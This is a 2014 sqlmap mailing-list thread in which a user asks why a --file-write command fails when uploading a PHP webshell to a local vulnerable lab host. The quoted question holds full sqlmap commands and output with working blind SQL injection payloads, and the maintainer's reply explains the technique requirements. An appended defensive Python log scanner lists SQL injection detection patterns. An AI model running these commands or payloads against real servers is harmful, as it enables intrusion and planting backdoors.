Re: [sqlmap-users] File Write Error
From: Miroslav S. <mir...@gm...> - 2014-03-21 09:42:33
Hi.

--file-write requires union or stacked techniques to be available. In case of --os-shell we also use INTO OUTFILE technique which is pretty dirty (in most of cases you can expect original results appearing in the first couple of lines). Option --file-write in our case should produce a "clean" file.

Kind regards,
Miroslav Stampar

On Fri, Mar 21, 2014 at 4:18 AM, Brian Olson <br...@hu...> wrote:

> Hello Everyone,
>
> I'm attempting to use sqlmap to exploit a local installation of some
> software. I know it's vulnerable because it's on exploit-db & metasploit
> pops it every time (http://www.exploit-db.com/exploits/20501/). I've had
> limited success with sqlmap, but I'm at the final stage now where I'm
> trying to use the sqli's I've found to upload a webshell via sqlmap. No
> dice....I'm getting an error stating "[ERROR] none of the SQL injection
> techniques detected can be used to write files to the underlying file
> system of the back-end MySQL server." Other than the obvious, I'm not sure
> what this means because --os-shell and --os-cmd upload a file and execute
> just fine. Does --file-write need something special? Here's the output:
>
> root@kali:/usr/share/sqlmap# sqlmap -u "
> http://172.16.71.138:7879/index.php?act=auth-login&pag=login&username=admin&password=admin"
> -p "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write
> /usr/share/webshells/php/simple-backdoor.php --file-dest
> progra~1/cyclope/ni4zlja=/backdoor.php -v3
>
> ...
> [*] starting at 23:13:08
>
> [23:13:08] [DEBUG] cleaning up configuration parameters
> [23:13:08] [DEBUG] setting the HTTP timeout
> [23:13:08] [DEBUG] setting the HTTP method to GET
> [23:13:08] [DEBUG] creating HTTP requests opener object
> [23:13:08] [DEBUG] forcing back-end DBMS to user defined value
> [23:13:08] [DEBUG] setting the write file functionality
> [23:13:08] [INFO] testing connection to the target URL
> [23:13:08] [DEBUG] declared web page charset 'utf-8'
> sqlmap identified the following injection points with a total of 0 HTTP(s)
> requests:
> ---
> Place: GET
> Parameter: username
> Type: boolean-based blind
> Title: AND boolean-based blind - WHERE or HAVING clause
> Payload: act=auth-login&pag=login&username=admin' AND 2011=2011 AND
> 'yVaP'='yVaP&password=admin
> Vector: AND [INFERENCE]
>
> Type: AND/OR time-based blind
> Title: MySQL > 5.0.11 AND time-based blind
> Payload: act=auth-login&pag=login&username=admin' AND SLEEP(5) AND
> 'OHln'='OHln&password=admin
> Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
> ---
> [23:13:08] [INFO] testing MySQL
> [23:13:08] [INFO] confirming MySQL
> [23:13:08] [INFO] the back-end DBMS is MySQL
> web server operating system: Windows
> web application technology: PHP 5.3.1, Apache 2.2.14
> back-end DBMS: MySQL >= 5.0.0
> [23:13:08] [INFO] fingerprinting the back-end DBMS operating system
> [23:13:08] [INFO] the back-end DBMS operating system is Windows
> [23:13:08] [ERROR] none of the SQL injection techniques detected can be
> used to write files to the underlying file system of the back-end MySQL
> server
> [23:13:08] [INFO] fetched data logged to text files under
> '/usr/share/sqlmap/output/172.16.71.138'
>
> [*] shutting down at 23:13:08
>
>
> The results are the same when the cmdline is changed up for a POST version:
>
> root@kali:/usr/share/sqlmap# sqlmap -u "
> http://172.16.71.138:7879/index.php"
> --data='act=auth-login&pag=login&username=admin&password=admin' -p
> "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write
> /usr/share/webshells/php/simple-backdoor.php --file-dest
> progra~1/cyclope/ni4zlja=/backdoor.php -v3
>
> Any thoughts on what may be happening here would be much appreciated.
>
> Thanks,
>
> Brian

--
Miroslav Stampar
http://about.me/stamparm
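
Added example, not part of the original thread and not sqlmap code: a defender-side scan of web access logs that labels request parameters by the technique classes named above (boolean-based blind, time-based blind, union, stacked, INTO OUTFILE). The log lines are constructed from the two payloads quoted in the output; the signature set and the names `SIGNATURES`, `classify` and `scan` are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Heuristic signatures keyed by the technique names used in the thread (assumed set).
SIGNATURES = {
    "boolean-blind": re.compile(r"\b(?:AND|OR)\s+(\d+)\s*=\s*\1\b", re.I),
    "time-blind": re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I),
    "union": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    "stacked": re.compile(r";\s*(?:SELECT|INSERT|UPDATE|DELETE|DROP|CREATE)\b", re.I),
    "file-write": re.compile(r"\bINTO\s+(?:OUT|DUMP)FILE\b", re.I),
}
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (documentation IP, made-up timestamps and sizes).
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Mar/2014:23:13:01 +0000] "GET /index.php?act=auth-login'
    '&pag=login&username=admin&password=admin HTTP/1.1" 200 512',
    '192.0.2.10 - - [21/Mar/2014:23:13:02 +0000] "GET /index.php?act=auth-login'
    '&pag=login&username=admin%27%20AND%202011%3D2011%20AND%20%27yVaP%27%3D%27yVaP'
    '&password=admin HTTP/1.1" 200 512',
    '192.0.2.10 - - [21/Mar/2014:23:13:08 +0000] "GET /index.php?act=auth-login'
    '&pag=login&username=admin%27%20AND%20SLEEP%285%29%20AND%20%27OHln%27%3D%27OHln'
    '&password=admin HTTP/1.1" 200 512',
]

def classify(value):
    """Return the sorted technique labels whose signature matches a decoded value."""
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(value))

def scan(log_lines):
    """Return (line number, parameter, labels) for every suspicious query parameter."""
    findings = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        # parse_qsl URL-decodes each value, so encoded payloads are matched in clear.
        for param, value in parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True):
            labels = classify(value)
            if labels:
                findings.append((n, param, labels))
    return findings

if __name__ == "__main__":
    for n, param, labels in scan(SAMPLE_LOG):
        print(f"line {n}: parameter {param!r} -> {', '.join(labels)}")
```

The POST variant of the command sends the same parameters in the request body, which a standard access log does not record, so the same `classify` check would have to run on body data captured by a WAF or application-level logging.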